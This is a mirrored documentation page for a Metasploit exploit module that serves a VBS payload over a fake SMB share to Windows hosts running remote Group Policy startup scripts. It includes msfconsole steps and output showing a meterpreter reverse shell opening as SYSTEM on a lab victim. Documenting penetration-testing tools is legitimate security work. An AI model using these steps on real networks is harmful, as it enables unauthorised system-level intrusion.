CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/smb/group_policy_startup.md
Views: 11789

Vulnerable Application

This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations. This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges, while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB share to exploit it successfully.

Please note in some cases, it will take 5 to 10 minutes to receive a session.

More information available at Gotham Digital Science Security

Verification Steps

  1. Start msfconsole

  2. Do: use modules/exploits/windows/smb/group_policy_startup

  3. Do: exploit

Options

FILE_NAME

VBS File name to share (Default: random .vbs)

FOLDER_NAME

Folder name to share (Default: none)

SHARE

Share name (Default: Random)

Scenarios

Domain Group Policy

In this scenario, the following computers are present:

  1. Windows 7 (x64, Build 7601, SP1): Victim

  2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller

The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the OU computer container. Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with SYSTEM privs because its executed as a start up script. Theoretically, any computer in that OU would also execute the script on started up.

msf > use modules/exploits/windows/smb/group_policy_startup
msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
  FILE_NAME => startup.vbs
msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
  SHARE => scripts
msf exploit(windows/smb/group_policy_startup) > exploit
  [*] Exploit running as background job 0.
  [*] Exploit completed, but no session was created.

  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] File available on \\192.168.1.3\scripts\startup.vbs...
  [*] Started service listener on 192.168.1.3:445
  [*] Server started.
  [*] Sending stage (180291 bytes) to 192.168.1.4
  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
msf exploit(windows/smb/group_policy_startup) > sessions 1
  [*] Starting interaction with 1...

meterpreter > sysinfo
  Computer        : MSF-PC
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : MSF
  Logged On Users : 1
  Meterpreter     : x86/windows
meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM